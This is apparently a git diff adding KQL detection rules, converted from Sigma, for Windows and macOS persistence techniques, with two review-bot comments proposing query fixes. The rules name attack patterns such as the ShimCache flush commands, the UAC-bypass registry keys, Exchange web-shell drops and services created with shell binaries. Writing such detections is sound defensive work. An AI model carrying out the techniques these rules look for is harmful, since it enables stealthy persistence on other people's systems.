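Review bot: The NTDS exclusion compares `RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll"`, where the doubled `%` is the Sysmon escaping of an expand-string value; if DeviceRegistryEvents records the single-`%` form, the lsass.exe write to `\Services\NTDS\Parameters\ServiceDll` is not suppressed and the rule would alert on domain controllers for a legitimate event. Add the single-percent spelling alongside the existing one, as uncommon_microsoft_office_trusted_location_added already does for `%APPDATA%` / `%%APPDATA%%`: `(RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" or RegistryValueData =~ "%systemroot%\\system32\\ntdsa.dll")`.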
@@ -0,0 +1,10 @@
+// Title: Shell Open Registry Keys Manipulation
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/shimcache_flush.kql b/KQL/rules/Persistence/shimcache_flush.kql
new file mode 100644
index 00000000..ad06b4b2
--- /dev/null
+++ b/KQL/rules/Persistence/shimcache_flush.kql
@@ -0,0 +1,10 @@
+// Title: ShimCache Flush
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-01
+// Level: high
+// Description: Detects actions that clear the local ShimCache and remove forensic evidence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/Persistence/startup_item_file_created_macos.kql
new file mode 100644
index 00000000..1df6ef62
--- /dev/null
+++ b/KQL/rules/Persistence/startup_item_file_created_macos.kql
@@ -0,0 +1,15 @@
+// Title: Startup Item File Created - MacOS
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-14
+// Level: low
+// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
+Adversaries may use startup items automatically executed at boot initialization to establish persistence.
+Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005
+// False Positives:
+// - Legitimate administration activities
+
+DeviceFileEvents
+| where FolderPath endswith ".plist" and (FolderPath startswith "/Library/StartupItems/" or FolderPath startswith "/System/Library/StartupItems")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql
new file mode 100644
index 00000000..dafc5327
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious ASPX File Drop by Exchange
+// Author: Florian Roth (Nextron Systems), MSTI (query, idea)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
new file mode 100644
index 00000000..a3e73e24
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: high
+// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql
new file mode 100644
index 00000000..0587ee17
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Debugger Registration Cmdline
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-09-06
+// Level: high
+// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
new file mode 100644
index 00000000..bc22f733
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: high
+// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql
new file mode 100644
index 00000000..14be4920
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Drop by Exchange
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-04
+// Level: medium
+// Description: Detects suspicious file type dropped by an Exchange component in IIS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
new file mode 100644
index 00000000..894d04d5
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious File Write to Webapps Root Directory
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
+This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190
+
+DeviceFileEvents
+| where FolderPath contains "\\webapps\\ROOT\\" and (FolderPath contains "\\apache" or FolderPath contains "\\tomcat") and FolderPath endswith ".jsp" and (InitiatingProcessFolderPath endswith "\\dotnet.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\java.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_iis_module_registration.kql b/KQL/rules/Persistence/suspicious_iis_module_registration.kql
new file mode 100644
index 00000000..7b2e08b7
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_iis_module_registration.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious IIS Module Registration
+// Author: Florian Roth (Nextron Systems), Microsoft (idea)
+// Date: 2022-08-04
+// Level: high
+// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.004
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_new_service_creation.kql b/KQL/rules/Persistence/suspicious_new_service_creation.kql
new file mode 100644
index 00000000..5202d2e0
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_new_service_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious New Service Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-14
+// Level: high
+// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql
new file mode 100644
index 00000000..9b458273
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Printer Driver Empty Manufacturer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-01
+// Level: high
+// Description: Detects a suspicious printer driver installation with an empty Manufacturer value
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675
+// False Positives:
+// - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey endswith "\\CutePDF Writer v4.0*" or RegistryKey endswith "\\Version-3\\PDF24*" or (RegistryKey endswith "\\VNC Printer (PS)*" or RegistryKey endswith "\\VNC Printer (UD)*"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
new file mode 100644
index 00000000..5ac1d12c
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Process By Web Server Process
+// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190
+// False Positives:
+// - Particular web applications may spawn a shell process legitimately
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith 
"\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql new file mode 100644 index 00000000..4f062d73 --- /dev/null +++ b/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql 
@@ -0,0 +1,12 @@
+// Title: Suspicious Process Execution From Fake Recycle.Bin Folder
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: high
+// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql
new file mode 100644
index 00000000..1b81012b
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Registry Modification From ADS Via Regini.EXE
+// Author: Eli Salem, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
new file mode 100644
index 00000000..ad351cb9
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious ScreenSave Change by Reg.exe
+// Author: frack113
+// Date: 2021-08-19
+// Level: medium
+// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
+Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
+// False Positives:
+// - GPO
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_service_path_modification.kql b/KQL/rules/Persistence/suspicious_service_path_modification.kql
new file mode 100644
index 00000000..ae3e9bc4
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_service_path_modification.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Service Path Modification
+// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: high
+// Description: Detects service path modification via the "sc" binary to a suspicious command or path
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
new file mode 100644
index 00000000..9d6e36d2
--- /dev/null
+++ b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious VBoxDrvInst.exe Parameters
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
+This allows to create values in the registry and install drivers.
+For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql
new file mode 100644
index 00000000..5f67a5a7
--- /dev/null
+++ b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql
@@ -0,0 +1,10 @@
+// Title: Terminal Server Client Connection History Cleared - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-10-19
+// Level: high
+// Description: Detects the deletion of registry keys containing the MSTSC connection history
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112
+
+DeviceRegistryEvents
+| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\Microsoft\\Terminal Server Client\\Servers*")
\ No newline at end of file
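Review bot: In terminal_server_client_connection_history_cleared_registry, `ActionType =~ "DeleteValue"` is the Sysmon EventType name rather than a DeviceRegistryEvents ActionType, so the MRU branch never matches even though the second branch already uses the correct `RegistryValueDeleted`. Because MDE appears to report the deleted value's name in RegistryValueName instead of appending it to RegistryKey, the MRU clause should read `ActionType =~ "RegistryValueDeleted" and RegistryKey endswith "\\Microsoft\\Terminal Server Client\\Default" and RegistryValueName startswith "MRU"`. The `\\Servers*` comparison in the second branch also treats `*` as a literal character; `RegistryKey contains "\\Microsoft\\Terminal Server Client\\Servers"` expresses the intended prefix match.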
diff --git a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql
new file mode 100644
index 00000000..b5c08c75
--- /dev/null
+++ b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql
@@ -0,0 +1,12 @@
+// Title: Trust Access Disable For VBApplications
+// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-22
+// Level: high
+// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
new file mode 100644
index 00000000..a0f6f88c
--- /dev/null
+++ b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
@@ -0,0 +1,14 @@
+// Title: Trusted Path Bypass via Windows Directory Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-17
+// Level: high
+// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification.
+This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath contains ":\\Windows \\System32\\" or FolderPath contains ":\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql
new file mode 100644
index 00000000..47262b30
--- /dev/null
+++ b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql
@@ -0,0 +1,12 @@
+// Title: UAC Bypass With Fake DLL
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-06
+// Level: high
+// Description: Attempts to load dismcore.dll after dropping it
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001
+// False Positives:
+// - Actions of a legitimate telnet client
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql
new file mode 100644
index 00000000..bac7ab41
--- /dev/null
+++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql
@@ -0,0 +1,12 @@
+// Title: UEFI Persistence Via Wpbbin - FileCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql
new file mode 100644
index 00000000..231706a3
--- /dev/null
+++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql
@@ -0,0 +1,12 @@
+// Title: UEFI Persistence Via Wpbbin - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
new file mode 100644
index 00000000..e0664bca
--- /dev/null
+++ b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
